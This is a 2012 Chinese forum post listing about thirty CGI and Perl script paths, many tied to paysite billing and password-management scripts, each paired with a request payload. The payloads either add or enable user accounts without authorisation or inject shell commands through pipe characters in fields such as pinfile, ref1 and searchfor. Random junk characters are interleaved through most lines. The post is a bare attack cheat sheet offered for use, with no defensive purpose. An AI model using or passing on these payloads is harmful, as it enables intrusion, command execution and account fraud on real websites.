找回密码
 立即注册
查看: 3109|回复: 0
打印 上一主题 下一主题

Cgi-bin 30个漏洞+使用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:55:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
==============================
$ U( |+ g( g& T) Y( J& s, Z4 @  e' Q5 T2 M0 l( M% d
/smspass.pl
+ a( h% Z" }) |& x3 C9 Nusername=username&password=password
5 ?9 V5 [, r( e6 u
* Q1 c5 B1 @4 p. U# A1 M/index.cgi
. C; B$ A" T  `) H% j# E( wwei=ren&gen=command( E# L% d+ u/ _
3 H! z+ k% j3 G& Z
/passmaster.cgi5 B6 E" I3 Z" y1 V; }" m
Action=Add&Username=Username&Password=Password
% \+ l9 ?- L; b/ ^' @
* B+ Z4 s+ n! s; u" `& ]  {/accountcreate.cgi
; P2 f& G2 M: N; yusername=username&password=password&ref1=|echo;ls|# _6 r' l0 F2 {7 y) J3 E
+ p- G2 X( ]3 b/ l' R/ e! \- N& C2 t
/form.cgi
9 ?$ n( I- O' A; o. a% e" w+ i) b) P3 Uname=xxxx&email=email&subject=xxxx&response=|echo;ls|. ~- t* U: \) P9 \# S3 |
7 e+ K* u. p4 q8 O" V
/addusr.pl
" |4 {3 \* C# c& n/cgi-bin/EuroDebit/addusr.pl+ a, Q- @3 e0 j% Z* m
user=username&pass=Password&confirm=Password
1 C. ^; n8 g; k6 z( ?
4 D& R9 m  T% e' G1 ~1 [/ccbill-local.asp
" X: @$ F8 ?: X; v2 S- K8 Zpost_values=username:password, f- F  c  @! h8 k; w' t! o% M' L

5 v4 z. Y0 h/ X7 d/count.cgi! E4 j# G4 [% N7 F% S
pinfile=|echo;ls -la;exit|' s1 {9 p7 y3 `# ^/ C. L6 Q1 N
$ L5 H) g  {( p' a8 a
/recon.cgi
7 x6 z0 h7 Y  v* U0 Q/recon.cgi?search
# ?4 c( B9 h- I$ Esearchoption=1&searchfor=|echo;ls -al;exit|
  I: z. @9 `% q# j3 X' e# z( b. K1 W  \7 c" ?4 q; @/ h
/verotelrum.pl6 c' i/ X8 P: B  Y  e/ c! m
vercode=username:password:dseegsow:add:amount<&30>$ O' p! H+ L( ]5 q  d
; W4 ^4 w. m  e& V/ [
/af.cgi
! A5 Q( l+ }! u. d, t( }( u_browser_out=|echo;ls -la;exit;|
5 o' E- A+ |; ]. h
: n* \# C- z0 g. l: w5 S3 P/modify.cgi
, w. t  b! l7 {# p6 X" w  U6 }' Xusername=username&password=password&expire=30
' w8 I; f6 g6 o  Y
4 p* i2 [6 `, B8 Q/openjournal.cgi  q5 ~+ l2 ]+ H, V, W; b0 ^
edit=1&ct=2&go=|echo;ls -al;exit|3 L8 @# c- q" W; W) C
" I' F" ?$ W0 [" r# {
/gx9passwd.cgi* d- M* G0 N3 Y/ X0 B
cmd=ADD&user=username&pass=password
0 R3 ?* d" [3 Y0 d- E& C0 R8 a8 K% {
/probecontrol.cgi) [! a2 ]* s! a+ A
command=enable&username=username&password=password7 R. }7 q- Y% f( D/ n; {% B
3 Q% P% h$ s! n2 R2 `
/recon.cgi
: c/ a* [! @6 a5 Z0 d# m0 m; dsearchoption=3&searchfor=echo;ls -la;exit
& ?. b$ A, Q- x$ \) I, c% G, N; H9 y$ ?
/htadd.pl
% C/ j$ s: H( _/ Z% Uconfigfile=|echo; ls -alt; exit
  L6 \% n& [) ^
$ v3 I# J/ l5 [7 T" w- A: v/gx9passwd.cgi" g: p2 |" l1 _- ]7 W' Y
cmd=ADD&user=username&pass=password( l; Y0 `5 H) \/ O8 B& [
8 N) p- x/ K  l" P2 f
/ibill*.pl
/ s- g7 U& ^) Z* }3 rreqtype=add&authpwd=authpwd&username=username&password=password
* v) U5 ~$ |& Z# s
; T1 V- V" A4 n& ]: c7 `/cpay.cgi
; Y# @1 z  Y- u' A7 scommand=add_member&username=username(EMAIL)&password=password(DES)# G+ v$ M1 c8 W0 u9 K
. h! n1 ~$ D: [% O* r7 l/ ?6 `# }5 t
/globill_ut.cgi
  x' V5 r; l/ `. Ndo=add&username=username&password=password&wpassword=password
0 V9 A( X/ d# U$ Q' v! m7 w3 Q6 ^6 C  e" B, J) {" I
/usercontrol.cgi
2 ?- _4 z/ c% G" M  ~6 Vcommand=enable&username=USER&password=PASS4 I% M0 Q6 x/ Q2 |* @! p- j

1 N9 T' G/ _6 e/globoSALErum.cgi! A+ g& g4 G. r9 \! i# [# `( K0 R
action=ADD&seccode=seccode&login=username&password=password
" G$ |2 x: Y! r- T4 ^8 G" _5 q
7 Z! \$ S* }: ^4 B/addusr.pl
. t( I$ y$ }" ^5 j! F; Puser=USER&pass=PASS&confirm=PASS
! B. O( o- H% x7 Z) p4 ~7 U: V  i6 ^
8 a* B5 _2 I' p9 Z5 f5 F; U/pincount.cgi, r6 k7 p, X4 K# ]6 |1 w
/cgi-bin/mastergate/pincount.cgi. b1 C6 f! L3 r; \( x* e3 l
pinfile=|echo;pwd;exit|
+ `) y+ o. W- P' l9 }/ n& O; g- c6 I7 E+ j, A
/accountcreate.cgi7 M# ^2 V2 Y; Y4 q4 @  a
/cgi-bin/gateway/accountcreate.cgi( L) C* C& t/ k' ]6 P$ W2 T
username=username&password=password&password2=password&ref1=|echo;ls -al;exit9 g# n5 p* g0 i7 X1 q  T0 [
( A7 ?) r& z) [2 M0 i+ X
/af.cgi. y' g: i/ b5 |
/env.cgi
1 T5 O3 b5 G) [( q$ BADD+;echo;pwd;exit, n" s5 l. ~0 K9 a' x

4 G: D$ Y% [& }8 O+ }' B/count.cgi
; l0 T9 p( w+ d1 I# Dpinfile=|echo;pwd;exit|$ T7 t6 j1 Y: Q! {# D+ P; `( h

! U8 U4 a4 ^" i/recon.cgi- \3 ]  n% A/ x1 b3 J& ~5 j6 V
searchoption=1&searchfor=|echo;ls%20-al;exit|
( B; p% n% H* b% j4 o4 v: b0 {6 f+ h
/add.cgi( A2 u4 q* b3 w
username=username&password=password&expire=30
! C. \0 C2 S- ?/ p4 J$ \/ Y! O" p4 b0 M# m- Y* W
==============================
7 @* G" e0 e$ p* ^# Q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表